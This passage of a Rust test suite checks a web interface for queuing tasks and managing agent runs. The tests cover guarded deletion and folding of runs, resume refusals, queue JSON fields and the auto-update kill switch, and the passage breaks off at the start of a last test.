7825 fn only_the_cgnat_block_counts_as_a_tailnet_address() {
7826 assert!(is_tailnet(&Ipv4Addr::new(100, 64, 0, 1)));
7830 assert!(is_tailnet(&Ipv4Addr::new(100, 127, 255, 254)));
7831 assert!(!is_tailnet(&Ipv4Addr::new(100, 63, 255, 255)));
7832 assert!(!is_tailnet(&Ipv4Addr::new(100, 128, 0, 1)));
7833 assert!(!is_tailnet(&Ipv4Addr::new(127, 0, 0, 1)));
7834 }
7835
7836 #[test]
7837 fn an_ambiguous_prefix_is_a_bad_request_and_a_missing_one_is_not_found() {
7838 let ids = vec![
7839 "20260902-140501-aaaa".to_owned(),
7840 "20260902-140502-aabb".to_owned(),
7841 ];
7842
7843 let missing = pick(ids.clone(), "zzzz", "run").expect_err("no match");
7844 let ambiguous = pick(ids.clone(), "202609", "run").expect_err("two matches");
7845 let short = pick(ids, "aabb", "run").expect("the short id is the tail of an id");
7846
7847 assert_eq!(missing.status, StatusCode::NOT_FOUND);
7848 assert_eq!(ambiguous.status, StatusCode::BAD_REQUEST);
7849 assert_eq!(short, "20260902-140502-aabb");
7850 }
7851 #[tokio::test]
7852 async fn a_panel_reaches_its_assets_by_the_bare_name_it_was_told_to_use() {
7853 let fx = Fixture::start().await;
7859 let id = panel(
7860 &fx,
7861 "<img src=\"shot.png\">",
7862 &[("shot.png", b"\x89PNG\r\n\x1a\n")],
7863 );
7864
7865 let doc = fx
7867 .get(&format!("/api/questions/{id}/panel/index.html"))
7868 .await;
7869 assert_eq!(doc.status, 200, "{}", doc.body);
7870 assert_eq!(doc.header("content-type"), Some("text/html; charset=utf-8"));
7871
7872 let sibling = fx.get(&format!("/api/questions/{id}/panel/shot.png")).await;
7873 assert_eq!(sibling.status, 200, "{}", sibling.body);
7874 assert_eq!(sibling.header("content-type"), Some("image/png"));
7875 assert_eq!(
7876 sibling.header("content-security-policy"),
7877 Some(PANEL_CSP),
7878 "the sibling route must carry the same policy as the asset route"
7879 );
7880
7881 assert_eq!(
7884 fx.head(&format!("/api/questions/{id}/panel")).await.status,
7885 200
7886 );
7887 }
7888
7889 #[test]
7890 fn runs_revision_moves_when_deleting_an_older_run() {
7891 let temp = TempDir::new().expect("tempdir");
7892 let runs = temp.path().join("runs");
7893 std::fs::create_dir_all(&runs).expect("create runs dir");
7894
7895 assert_eq!(runs_revision(&runs), 0, "empty runs has 0 revision");
7896
7897 write_run(&runs, "20260901-100000-old1", RunStatus::Merged);
7898 std::thread::sleep(Duration::from_millis(10));
7899 write_run(&runs, "20260902-100000-new2", RunStatus::Merged);
7900
7901 let rev_before = runs_revision(&runs);
7902 assert!(rev_before > 0);
7903
7904 let old_dir = runs.join("20260901-100000-old1");
7905 std::fs::remove_dir_all(&old_dir).expect("remove old run");
7906
7907 let rev_after = runs_revision(&runs);
7908 assert_ne!(
7909 rev_before, rev_after,
7910 "deleting an older run must change the revision so other clients see the deletion"
7911 );
7912 }
7913
7914 fn write_state(runs: &FsPath, state: &RunState) {
7919 let dir = runs.join(&state.id);
7920 std::fs::create_dir_all(&dir).expect("run dir");
7921 std::fs::write(
7922 dir.join("run.json"),
7923 serde_json::to_string_pretty(state).expect("serialize run"),
7924 )
7925 .expect("write run.json");
7926 }
7927
7928 #[test]
7933 fn runs_revision_moves_when_a_seat_starts_and_again_when_it_finishes() {
7934 let temp = TempDir::new().expect("tempdir");
7935 let runs = temp.path().join("runs");
7936 std::fs::create_dir_all(&runs).expect("create runs dir");
7937 let mut state = RunState::new(
7938 PathBuf::from("/repo/magi"),
7939 "main".to_owned(),
7940 "0123456789abcdef".to_owned(),
7941 "task".to_owned(),
7942 Config::default(),
7943 );
7944 state.id = "20260902-100000-c0de".to_owned();
7945 write_state(&runs, &state);
7946
7947 let rev_idle = runs_revision(&runs);
7948 std::thread::sleep(Duration::from_millis(10));
7949 state.seat_started("judge", "judge-1", std::time::Duration::from_secs(60), 0);
7950 write_state(&runs, &state);
7951 let rev_started = runs_revision(&runs);
7952 assert_ne!(
7953 rev_idle, rev_started,
7954 "a seat starting must move the revision"
7955 );
7956
7957 std::thread::sleep(Duration::from_millis(10));
7958 state.seat_finished("judge-1");
7959 write_state(&runs, &state);
7960 let rev_finished = runs_revision(&runs);
7961 assert_ne!(
7962 rev_started, rev_finished,
7963 "and clearing it again must move the revision a second time"
7964 );
7965 }
7966
7967 #[tokio::test]
7968 async fn queue_json_carries_dependency_fields_and_a_hold_clears_them() {
7969 let fx = Fixture::start().await;
7974 let q = fx.queue();
7975
7976 let mut t = Task::new(
7977 "Task".to_owned(),
7978 "Instruction".to_owned(),
7979 PathBuf::from("/repo"),
7980 Source::Human,
7981 );
7982 t.block(
7983 vec!["20260101-000000-dead".to_owned()],
7984 Some("waiting on Task 1".to_owned()),
7985 );
7986 t.answers.push(crate::queue::AnsweredQuestion {
7987 question: "Which backend?".to_owned(),
7988 answer: "SQLite".to_owned(),
7989 });
7990 q.put(&mut t).expect("put t");
7991
7992 let res = fx.get("/api/queue").await;
7993 assert_eq!(res.status, 200);
7994 let list = res.json();
7995 let view = list
7996 .as_array()
7997 .expect("array")
7998 .iter()
7999 .find(|v| v["id"] == t.id)
8000 .expect("task in list");
8001 assert_eq!(view["status_str"], "blocked");
8002 assert_eq!(
8003 view["blocked_by"],
8004 serde_json::json!(["20260101-000000-dead"])
8005 );
8006 assert_eq!(view["block_reason"], "waiting on Task 1");
8007 assert_eq!(view["answers"][0]["question"], "Which backend?");
8008 assert_eq!(view["answers"][0]["answer"], "SQLite");
8009
8010 let res = fx
8014 .post(&format!("/api/queue/{}/hold", t.short()), None)
8015 .await;
8016 assert_eq!(res.status, 200);
8017 let held = res.json();
8018 assert_eq!(held["status_str"], "held");
8019 assert_eq!(held["blocked_by"], serde_json::json!([]));
8020 assert!(held["block_reason"].is_null());
8021 assert_eq!(held["answers"][0]["answer"], "SQLite");
8022 }
8023
8024 #[tokio::test]
8025 async fn queue_json_shows_a_blocked_chain_and_its_stuck_root() {
8026 let fx = Fixture::start().await;
8027 let q = fx.queue();
8028 let mk = |title: &str| {
8029 Task::new(
8030 title.to_owned(),
8031 "Instruction".to_owned(),
8032 PathBuf::from("/repo"),
8033 Source::Human,
8034 )
8035 };
8036 let mut root = mk("root");
8037 root.hold_manual(Some("waiting".to_owned()));
8038 q.put(&mut root).unwrap();
8039 let mut mid = mk("mid");
8040 mid.block(vec![root.id.clone()], None);
8041 q.put(&mut mid).unwrap();
8042 let mut leaf = mk("leaf");
8043 leaf.block(vec![mid.id.clone()], None);
8044 q.put(&mut leaf).unwrap();
8045
8046 let list = fx.get("/api/queue").await.json();
8047 let find = |id: &str| {
8048 list.as_array()
8049 .unwrap()
8050 .iter()
8051 .find(|v| v["id"] == id)
8052 .unwrap()
8053 .clone()
8054 };
8055 let leaf_view = find(&leaf.id);
8056 assert_eq!(
8057 leaf_view["waits_on"],
8058 serde_json::json!([format!("{} (blocked → {} held)", mid.short(), root.short())])
8059 );
8060 assert_eq!(leaf_view["stuck_roots"], serde_json::json!([root.short()]));
8061 assert_eq!(
8062 find(&mid.id)["waits_on"],
8063 serde_json::json!([format!("{} (held)", root.short())])
8064 );
8065 assert_eq!(find(&root.id)["waits_on"], serde_json::json!([]));
8066 }
8067
8068 #[tokio::test]
8069 async fn delete_queue_task_deletes_file_and_guards_running_and_locked() {
8070 let fx = Fixture::start().await;
8071 let q = fx.queue();
8072
8073 let mut t1 = Task::new(
8075 "Task 1".to_owned(),
8076 "Instruction 1".to_owned(),
8077 PathBuf::from("/repo"),
8078 Source::Human,
8079 );
8080 let run_id = "20260901-000000-r111";
8081 t1.runs.push(run_id.to_owned());
8082 write_run(&fx.runs(), run_id, RunStatus::Merged);
8083 q.put(&mut t1).expect("put t1");
8084
8085 let res = fx.delete(&format!("/api/queue/{}", t1.short())).await;
8087 assert_eq!(res.status, 204);
8088 assert!(res.body.is_empty(), "204 No Content has no body");
8089 assert!(!q.path_of(&t1.id).exists(), "task file is deleted");
8090 assert!(
8091 fx.runs().join(run_id).exists(),
8092 "run directory must not be deleted when its task is deleted"
8093 );
8094
8095 let mut t2 = Task::new(
8097 "Task 2".to_owned(),
8098 "Instruction 2".to_owned(),
8099 PathBuf::from("/repo"),
8100 Source::Human,
8101 );
8102 t2.status = TaskStatus::Running;
8103 q.put(&mut t2).expect("put t2");
8104 let mut beat = crate::daemon::Status::new();
8105 beat.current = vec![crate::daemon::Current {
8106 task: t2.id.clone(),
8107 run: "20260901-000000-r222".to_owned(),
8108 }];
8109 beat.updated_at = jiff::Timestamp::now();
8110 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8111 .expect("publish a heartbeat");
8112 let res = fx.delete(&format!("/api/queue/{}", t2.id)).await;
8113 assert_eq!(res.status, 409);
8114 assert!(
8115 res.json()["error"]
8116 .as_str()
8117 .unwrap()
8118 .contains("live daemon")
8119 );
8120 assert!(q.path_of(&t2.id).exists(), "a task in flight is kept");
8121
8122 beat.updated_at = jiff::Timestamp::now() - jiff::SignedDuration::from_secs(600);
8128 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8129 .expect("leave a stale heartbeat");
8130 let mut t3 = Task::new(
8131 "Task 3".to_owned(),
8132 "Instruction 3".to_owned(),
8133 PathBuf::from("/repo"),
8134 Source::Human,
8135 );
8136 t3.status = TaskStatus::Running;
8137 q.put(&mut t3).expect("put t3");
8138 std::mem::forget(q.claim(&t3.id).expect("claim t3"));
8139 let res = fx.delete(&format!("/api/queue/{}", t3.id)).await;
8140 assert_eq!(res.status, 204);
8141 assert!(!q.path_of(&t3.id).exists(), "the task file is gone");
8142 assert!(
8143 q.claim(&t3.id).is_ok(),
8144 "the stale lock went with it, so the id is claimable again"
8145 );
8146
8147 let res = fx.delete("/api/queue/nonexistent").await;
8149 assert_eq!(res.status, 404);
8150 }
8151
8152 #[tokio::test]
8153 async fn delete_run_deletes_directory_and_guards_running_and_unfolded() {
8154 let fx = Fixture::start().await;
8155 let runs = fx.runs();
8156
8157 let run_id = "20260901-000000-fold";
8159 let mut state = RunState::new(
8160 PathBuf::from("/repo"),
8161 "main".to_owned(),
8162 "abc".to_owned(),
8163 "instruction".to_owned(),
8164 Config::default(),
8165 );
8166 state.id = run_id.to_owned();
8167 state.status = RunStatus::Merged;
8168 state.candidates.push(crate::run::Candidate {
8169 index: 0,
8170 label: 'A',
8171 agent: "a".to_owned(),
8172 branch: "b".to_owned(),
8173 worktree: PathBuf::from("/w"),
8174 summary: String::new(),
8175 stat: String::new(),
8176 files: 1,
8177 commits: 1,
8178 empty: false,
8179 failed: None,
8180 verified_noop: None,
8181 duration_ms: 0,
8182 folded: true,
8183 });
8184 let dir = runs.join(run_id);
8185 std::fs::create_dir_all(dir.join("artifacts")).expect("create artifacts");
8186 std::fs::write(dir.join("artifacts").join("patch.diff"), "dummy diff")
8187 .expect("write artifact");
8188 std::fs::write(dir.join("run.json"), serde_json::to_string(&state).unwrap())
8189 .expect("write run.json");
8190
8191 let res = fx.delete(&format!("/api/runs/{}", state.short())).await;
8193 assert_eq!(res.status, 204);
8194 assert!(res.body.is_empty(), "204 has no body");
8195 assert!(!dir.exists(), "run directory and artifacts must be deleted");
8196
8197 let run_running = "20260901-000000-rung";
8202 write_run(&runs, run_running, RunStatus::Prep);
8203 let mut beat = crate::daemon::Status::new();
8204 beat.current = vec![crate::daemon::Current {
8205 task: "20260901-000000-task".to_owned(),
8206 run: run_running.to_owned(),
8207 }];
8208 beat.updated_at = jiff::Timestamp::now();
8209 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8210 .expect("publish a heartbeat");
8211 let res = fx.delete(&format!("/api/runs/{run_running}")).await;
8212 assert_eq!(res.status, 409);
8213 assert!(
8214 res.json()["error"]
8215 .as_str()
8216 .unwrap()
8217 .contains("live daemon"),
8218 "the refusal must say who is holding it"
8219 );
8220 assert!(
8221 runs.join(run_running).exists(),
8222 "a run in flight keeps its directory"
8223 );
8224
8225 let run_unfolded = "20260901-000000-unfd";
8227 let mut state2 = RunState::new(
8228 PathBuf::from("/repo"),
8229 "main".to_owned(),
8230 "abc".to_owned(),
8231 "instruction".to_owned(),
8232 Config::default(),
8233 );
8234 state2.id = run_unfolded.to_owned();
8235 state2.status = RunStatus::Ready;
8236 state2.candidates.push(crate::run::Candidate {
8237 index: 0,
8238 label: 'A',
8239 agent: "a".to_owned(),
8240 branch: "b".to_owned(),
8241 worktree: PathBuf::from("/w"),
8242 summary: String::new(),
8243 stat: String::new(),
8244 files: 1,
8245 commits: 1,
8246 empty: false,
8247 failed: None,
8248 verified_noop: None,
8249 duration_ms: 0,
8250 folded: false,
8251 });
8252 let dir2 = runs.join(run_unfolded);
8253 std::fs::create_dir_all(&dir2).expect("create dir2");
8254 std::fs::write(
8255 dir2.join("run.json"),
8256 serde_json::to_string(&state2).unwrap(),
8257 )
8258 .expect("write run.json");
8259
8260 let res = fx.delete(&format!("/api/runs/{run_unfolded}")).await;
8261 assert_eq!(res.status, 409);
8262 assert!(res.json()["error"].as_str().unwrap().contains("magi fold"));
8263 assert!(dir2.exists(), "unfolded run directory is kept");
8264
8265 let res = fx.delete("/api/runs/nonexistent").await;
8267 assert_eq!(res.status, 404);
8268 }
8269
8270 #[test]
8271 fn web_ui_delete_contract_in_front_end() {
8272 assert!(APP_JS.contains("deleteRun:"));
8274 assert!(APP_JS.contains("deleteTask:"));
8275
8276 let run_cards_slice = &APP_JS[APP_JS.find("function createRunCard").unwrap()
8278 ..APP_JS.find("function renderRuns").unwrap()];
8279 assert!(!run_cards_slice.to_lowercase().contains("delete"));
8280
8281 assert!(APP_JS.contains("renderRunDelete"));
8283 assert!(APP_JS.contains("runDeleteReason"));
8284 assert!(APP_JS.contains("magi fold"));
8285 assert!(APP_JS.contains("This run is still in flight and cannot be deleted."));
8286
8287 assert!(APP_JS.contains("cancel.focus"));
8289 assert!(APP_JS.contains("armedRunDelete"));
8290 assert!(APP_JS.contains("armedDelete"));
8291
8292 assert!(APP_JS.contains("disabled: status === \"running\""));
8294 }
8295
8296 #[test]
8316 fn every_ref_a_run_card_uses_is_one_its_builder_published() {
8317 let build = APP_JS
8318 .find("function createRunCard")
8319 .expect("createRunCard exists");
8320 let update = APP_JS
8321 .find("function updateRunCard")
8322 .expect("updateRunCard exists");
8323 let end = APP_JS
8324 .find("function renderRuns")
8325 .expect("renderRuns exists");
8326
8327 let builder = &APP_JS[build..update];
8329 let open = builder.find("refs = {").expect("createRunCard sets refs");
8330 let literal = &builder[open + "refs = {".len()..];
8331 let close = literal.find('}').expect("the refs literal is closed");
8332 let published: HashSet<&str> = literal[..close]
8333 .split(',')
8334 .filter_map(|entry| entry.split(':').next())
8336 .map(str::trim)
8337 .filter(|name| !name.is_empty())
8338 .collect();
8339 assert!(
8340 published.len() > 5,
8341 "the refs literal did not parse into names: {published:?}"
8342 );
8343
8344 let mut used: Vec<&str> = Vec::new();
8347 let updaters = &APP_JS[update..end];
8348 for (at, _) in updaters.match_indices("r.") {
8349 let before = updaters[..at].chars().next_back();
8352 if before.is_some_and(|c| c.is_alphanumeric() || c == '_' || c == '$' || c == '.') {
8353 continue;
8354 }
8355 let rest = &updaters[at + 2..];
8356 let len = rest
8357 .find(|c: char| !(c.is_alphanumeric() || c == '_' || c == '$'))
8358 .unwrap_or(rest.len());
8359 if len > 0 {
8360 used.push(&rest[..len]);
8361 }
8362 }
8363 assert!(
8364 used.len() > 5,
8365 "no `r.<name>` uses were found; the updaters must have been rewritten: {used:?}"
8366 );
8367
8368 let missing: Vec<&str> = used
8369 .iter()
8370 .copied()
8371 .filter(|name| !published.contains(name))
8372 .collect();
8373 assert!(
8374 missing.is_empty(),
8375 "a run card's updater reaches for {missing:?}, which `createRunCard` \
8376 never put in `refs` - every card will throw and the list will \
8377 render empty under a count line that says otherwise. Published: \
8378 {published:?}"
8379 );
8380 }
8381
8382 #[tokio::test]
8383 async fn folding_from_the_phone_reports_what_it_removed() {
8384 let fx = Fixture::start().await;
8385 let runs = fx.runs();
8386
8387 let id = "20260901-000000-fold";
8391 write_run(&runs, id, RunStatus::Stalled);
8392 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
8393 assert_eq!(res.status, 200);
8394 assert_eq!(res.json()["removed_count"], 0);
8395 assert_eq!(res.json()["run"], id);
8396 assert!(
8397 runs.join(id).exists(),
8398 "a fold keeps the run's record; only the worktrees go"
8399 );
8400 }
8401
8402 #[tokio::test]
8403 async fn folding_an_unreadable_run_falls_back_to_removing_it_wholesale() {
8404 let fx = Fixture::start().await;
8405 let runs = fx.runs();
8406 let wt = fx.home.path().join("wt").join("magi").join("dead");
8407 let id = "20260901-000000-dead";
8408 std::fs::create_dir_all(runs.join(id)).expect("run dir");
8409 std::fs::write(runs.join(id).join("run.json"), "not json").expect("garbage state");
8410 std::fs::create_dir_all(&wt).expect("worktree dir");
8411
8412 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
8413 assert_eq!(res.status, 200, "{}", res.body);
8414 assert!(
8415 res.json()["removed_count"].as_u64().unwrap() > 0,
8416 "the worktree this build could not read a state for still went"
8417 );
8418 assert!(
8419 !runs.join(id).exists(),
8420 "an unreadable run has no candidate list to fold selectively, so \
8421 the whole record goes - same as `magi fold` on the CLI"
8422 );
8423 }
8424
8425 #[tokio::test]
8426 async fn deleting_an_unreadable_run_removes_it_wholesale() {
8427 let fx = Fixture::start().await;
8428 let runs = fx.runs();
8429 let wt = fx.home.path().join("wt").join("magi").join("gone");
8430 let id = "20260901-000000-gone";
8431 std::fs::create_dir_all(runs.join(id)).expect("run dir");
8432 std::fs::write(runs.join(id).join("run.json"), "not json").expect("garbage state");
8433 std::fs::create_dir_all(&wt).expect("worktree dir");
8434
8435 let res = fx.delete(&format!("/api/runs/{id}")).await;
8436 assert_eq!(res.status, 204, "{}", res.body);
8437 assert!(!runs.join(id).exists(), "the broken record is gone");
8438 assert!(!wt.exists(), "its worktree is gone too");
8439 }
8440
8441 #[tokio::test]
8442 async fn folding_is_refused_while_a_daemon_is_working_on_the_run() {
8443 let fx = Fixture::start().await;
8444 let runs = fx.runs();
8445 let id = "20260901-000000-live";
8446 write_run(&runs, id, RunStatus::Implementing);
8447
8448 let mut beat = crate::daemon::Status::new();
8449 beat.current = vec![crate::daemon::Current {
8450 task: "20260901-000000-task".to_owned(),
8451 run: id.to_owned(),
8452 }];
8453 beat.updated_at = jiff::Timestamp::now();
8454 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8455 .expect("publish a heartbeat");
8456
8457 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
8458 assert_eq!(res.status, 409);
8459 assert!(
8460 res.json()["error"]
8461 .as_str()
8462 .unwrap()
8463 .contains("live daemon"),
8464 "folding under a running agent would pull its worktree away"
8465 );
8466 }
8467
8468 #[tokio::test]
8469 async fn fold_merged_requires_a_pr_url() {
8470 let fx = Fixture::start().await;
8471 let runs = fx.runs();
8472 let id = "20260901-000000-nourl";
8473 write_run(&runs, id, RunStatus::Blocked);
8474
8475 let res = fx
8476 .post(&format!("/api/runs/{id}/fold-merged"), Some("{}"))
8477 .await;
8478 assert_eq!(res.status, 400, "{}", res.body);
8479
8480 let blank = fx
8481 .post(
8482 &format!("/api/runs/{id}/fold-merged"),
8483 Some(r#"{"pr_url":" "}"#),
8484 )
8485 .await;
8486 assert_eq!(blank.status, 400, "{}", blank.body);
8487 }
8488
8489 #[tokio::test]
8490 async fn fold_merged_is_404_for_an_unknown_run() {
8491 let fx = Fixture::start().await;
8492 let res = fx
8493 .post(
8494 "/api/runs/nosuchrun/fold-merged",
8495 Some(r#"{"pr_url":"https://github.com/owner/repo/pull/1"}"#),
8496 )
8497 .await;
8498 assert_eq!(res.status, 404, "{}", res.body);
8499 }
8500
8501 #[tokio::test]
8502 async fn fold_merged_is_refused_while_a_daemon_is_working_on_the_run() {
8503 let fx = Fixture::start().await;
8504 let runs = fx.runs();
8505 let id = "20260901-000000-livemerge";
8506 write_run(&runs, id, RunStatus::Blocked);
8507
8508 let mut beat = crate::daemon::Status::new();
8509 beat.current = vec![crate::daemon::Current {
8510 task: "20260901-000000-task".to_owned(),
8511 run: id.to_owned(),
8512 }];
8513 beat.updated_at = jiff::Timestamp::now();
8514 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8515 .expect("publish a heartbeat");
8516
8517 let res = fx
8518 .post(
8519 &format!("/api/runs/{id}/fold-merged"),
8520 Some(r#"{"pr_url":"https://github.com/owner/repo/pull/1"}"#),
8521 )
8522 .await;
8523 assert_eq!(res.status, 409, "{}", res.body);
8524 assert!(
8525 res.json()["error"]
8526 .as_str()
8527 .unwrap()
8528 .contains("live daemon"),
8529 "correcting a run's merge underneath a running agent would race \
8530 whatever it is doing to the same `status`/`merge` fields"
8531 );
8532 }
8533
8534 #[tokio::test]
8539 async fn fold_merged_refuses_a_pull_request_it_cannot_confirm_is_merged() {
8540 let fx = Fixture::start().await;
8541 let runs = fx.runs();
8542 let id = "20260901-000000-unconfirmed";
8543 write_run(&runs, id, RunStatus::Blocked);
8544
8545 let res = fx
8546 .post(
8547 &format!("/api/runs/{id}/fold-merged"),
8548 Some(r#"{"pr_url":"https://github.com/owner/repo/pull/1"}"#),
8549 )
8550 .await;
8551 assert_eq!(res.status, 400, "{}", res.body);
8552 assert_eq!(
8553 read_run(&runs, id).unwrap().status,
8554 RunStatus::Blocked,
8555 "a pull request that could not be confirmed merged must leave \
8556 the run exactly where it was"
8557 );
8558 }
8559
8560 #[tokio::test]
8561 async fn resume_is_refused_unless_the_run_stopped_somewhere_it_can_continue() {
8562 let fx = Fixture::start().await;
8563 let runs = fx.runs();
8564
8565 for (status, word) in [
8571 (RunStatus::Merged, "merged"),
8572 (RunStatus::Ready, "ready"),
8573 (RunStatus::Failed, "failed"),
8574 ] {
8575 let id = format!("20260901-000000-{}", &word[..4]);
8576 write_run(&runs, &id, status);
8577 let res = fx.post(&format!("/api/runs/{id}/resume"), None).await;
8578 assert_eq!(res.status, 409, "{word} must not be resumable");
8579 let err = res.json()["error"].as_str().unwrap().to_owned();
8580 assert!(err.contains(word), "the refusal names the status: {err}");
8581 }
8582
8583 let mid = "20260901-000000-midf";
8588 write_run(&runs, mid, RunStatus::Reviewing);
8589 let res = fx.post(&format!("/api/runs/{mid}/resume"), None).await;
8590 assert_eq!(res.status, 202, "an interrupted run is resumable");
8591 }
8592
8593 #[tokio::test]
8594 async fn resume_is_refused_while_the_loop_is_running() {
8595 let fx = Fixture::start().await;
8596 let runs = fx.runs();
8597 let stalled = "20260901-000000-stal";
8598 write_run(&runs, stalled, RunStatus::Stalled);
8599
8600 let mut beat = crate::daemon::Status::new();
8604 beat.current = vec![crate::daemon::Current {
8605 task: "20260901-000000-task".to_owned(),
8606 run: "20260901-000000-othr".to_owned(),
8607 }];
8608 beat.updated_at = jiff::Timestamp::now();
8609 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8610 .expect("publish a heartbeat");
8611
8612 let res = fx.post(&format!("/api/runs/{stalled}/resume"), None).await;
8613 assert_eq!(res.status, 409);
8614 let err = res.json()["error"].as_str().unwrap().to_owned();
8615 assert!(err.contains("othr"), "it names what the loop is on: {err}");
8616 assert!(err.contains("stop it first"), "{err}");
8617 }
8618
8619 #[test]
8620 fn a_run_cannot_be_resumed_twice_at_once() {
8621 let home = TempDir::new().expect("temp home");
8622 let ui = Ui::new(
8623 Queue::at(home.path().join("queue")),
8624 Questions::at(home.path().join("questions")),
8625 Talks::at(home.path().join("talks")),
8626 home.path().join("runs"),
8627 home.path().to_path_buf(),
8628 PathBuf::from("/repo"),
8629 )
8630 .with_worktrees_root(home.path().join("wt"));
8631 let first = ui.begin_resume("20260901-000000-once").expect("claimed");
8632 let again = ui.begin_resume("20260901-000000-once");
8633 assert!(again.is_err(), "a second tap must not start a second graph");
8634 drop(first);
8635 assert!(
8636 ui.begin_resume("20260901-000000-once").is_ok(),
8637 "and the claim is released when the attempt ends"
8638 );
8639 }
8640
8641 #[test]
8642 fn talk_thinking_tracks_only_its_held_turn_claim() {
8643 let home = TempDir::new().expect("temp home");
8644 let ui = Ui::new(
8645 Queue::at(home.path().join("queue")),
8646 Questions::at(home.path().join("questions")),
8647 Talks::at(home.path().join("talks")),
8648 home.path().join("runs"),
8649 home.path().to_path_buf(),
8650 PathBuf::from("/repo"),
8651 )
8652 .with_worktrees_root(home.path().join("wt"));
8653 let id = "20260901-000000-once";
8654
8655 assert!(!ui.is_thinking(id), "an unclaimed talk is not thinking");
8656 let turn = ui.begin_talk_turn(id).expect("claim turn");
8657 assert!(ui.is_thinking(id), "the held guard is reported as thinking");
8658 assert!(
8659 !ui.is_thinking("20260901-000000-other"),
8660 "one talk's turn does not make another talk busy"
8661 );
8662 drop(turn);
8663 assert!(!ui.is_thinking(id), "dropping the guard releases thinking");
8664 }
8665
8666 #[tokio::test]
8667 async fn an_upgrade_is_refused_when_the_loop_belongs_to_another_process() {
8668 let fx = Fixture::start().await;
8669 let mut beat = crate::daemon::Status::new();
8673 beat.pid = 4321;
8674 beat.updated_at = jiff::Timestamp::now();
8675 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8676 .expect("publish a heartbeat");
8677
8678 let res = fx.post("/api/upgrade", None).await;
8679 assert_eq!(res.status, 409);
8680 let err = res.json()["error"].as_str().unwrap().to_owned();
8681 assert!(err.contains("4321"), "the refusal names the owner: {err}");
8682 assert!(err.contains("old one against the same queue"), "{err}");
8683 }
8684
8685 #[test]
8692 fn recheck_never_spawns_when_checking_is_off_or_killed_by_env() {
8693 assert!(!should_spawn_recheck(&crate::config::Update {
8694 mode: UpdateMode::Off,
8695 interval: None,
8696 }));
8697
8698 unsafe {
8701 std::env::set_var(crate::updater::NO_AUTOUPDATE_ENV, "1");
8702 }
8703 let killed = should_spawn_recheck(&crate::config::Update {
8704 mode: UpdateMode::Notify,
8705 interval: None,
8706 });
8707 unsafe {
8708 std::env::remove_var(crate::updater::NO_AUTOUPDATE_ENV);
8709 }
8710 assert!(
8711 !killed,
8712 "MAGI_NO_AUTOUPDATE must stop the periodic recheck, not just the \
8713 one-time startup check"
8714 );
8715
8716 assert!(should_spawn_recheck(&crate::config::Update {
8717 mode: UpdateMode::Notify,
8718 interval: None,
8719 }));
8720 }
8721
8722 #[test]
8728 fn recheck_poll_period_tracks_a_short_configured_interval() {
8729 let short = crate::config::Update {
8730 mode: UpdateMode::Notify,
8731 interval: Some("1m".to_owned()),
8732 };
8733 let period = recheck_poll_period(&short);
8734 assert!(
8735 period <= Duration::from_secs(30),
8736 "a one-minute interval must wake the task far sooner than the \
8737 default ceiling, or the deck would not notice within the \
8738 interval the operator configured: got {period:?}"
8739 );
8740
8741 let default = crate::config::Update {
8742 mode: UpdateMode::Notify,
8743 interval: None,
8744 };
8745 assert_eq!(
8746 recheck_poll_period(&default),
8747 UPDATE_RECHECK_POLL_MAX,
8748 "the default day-long interval should poll at the (capped) \
8749 ceiling rather than needlessly often"
8750 );
8751 }
8752
8753 #[test]
8761 fn recheck_skips_the_network_before_the_interval_elapses() {
8762 let dir = TempDir::new().expect("temp dir");
8763 let path = dir.path().join("state.json");
8764 let state = kaishin::UpdateCheckState {
8765 last_checked_unix: jiff::Timestamp::now().as_second() as u64,
8766 last_known_latest: None,
8767 last_known_url: None,
8768 };
8769 kaishin::save_check_state(&path, &state).expect("seed a just-checked state");
8770
8771 let checker = crate::updater::Checker::for_test(Duration::from_secs(24 * 60 * 60), path);
8772 assert!(
8773 !update_recheck_due(&checker, None),
8774 "a check made moments ago must not be repeated before the \
8775 configured interval elapses"
8776 );
8777 }
8778
8779 #[test]
8785 fn recheck_defers_to_an_upgrade_already_in_flight() {
8786 let dir = TempDir::new().expect("temp dir");
8787 let path = dir.path().join("state.json");
8788 let checker = crate::updater::Checker::for_test(Duration::from_secs(60 * 60), path);
8789 let progress = crate::updater::Progress::new("0.8.0".to_owned(), "v0.9.0".to_owned());
8790
8791 assert!(
8792 !update_recheck_due(&checker, Some(&progress)),
8793 "a recheck must not run while an upgrade this deck started is \
8794 still moving"
8795 );
8796 }
8797
8798 #[tokio::test]
8799 async fn an_upgrade_is_refused_by_the_no_autoupdate_kill_switch() {
8800 unsafe {
8812 std::env::set_var(crate::updater::NO_AUTOUPDATE_ENV, "1");
8813 }
8814 let fx = Fixture::start().await;
8815 let res = fx.post("/api/upgrade", None).await;
8816 unsafe {
8817 std::env::remove_var(crate::updater::NO_AUTOUPDATE_ENV);
8818 }
8819 assert_eq!(res.status, 200, "not 202: nothing was set in motion");
8820 let body = res.json();
8821 assert!(body["to"].is_null(), "there was no release to move to");
8822 assert!(body["parked"].is_null(), "and nothing was parked");
8823 assert!(
8824 body["detail"]
8825 .as_str()
8826 .unwrap()
8827 .contains("disabled by MAGI_NO_AUTOUPDATE"),
8828 "{body:?}"
8829 );
8830 }
8831
8832 #[tokio::test]
8833 async fn an_upgrade_with_nothing_to_install_changes_nothing() {
8834 let repo = TempDir::new().expect("repo dir");
8850 std::fs::write(repo.path().join("magi.toml"), "[update]\nmode = \"off\"\n")
8851 .expect("write magi.toml");
8852 let fx = Fixture::with_repo(repo.path().to_path_buf()).await;
8853
8854 let res = fx.post("/api/upgrade", None).await;
8860 assert_eq!(res.status, 200, "not 202: nothing was set in motion");
8861 let body = res.json();
8862 assert!(body["to"].is_null(), "there was no release to move to");
8863 assert!(body["parked"].is_null(), "and nothing was parked");
8864 assert!(
8865 body["detail"]
8866 .as_str()
8867 .unwrap()
8868 .contains("nothing restarted"),
8869 "{body:?}"
8870 );
8871 }
8872
8873 #[tokio::test]
8874 async fn health_reports_the_running_version_and_no_pending_upgrade_by_default() {
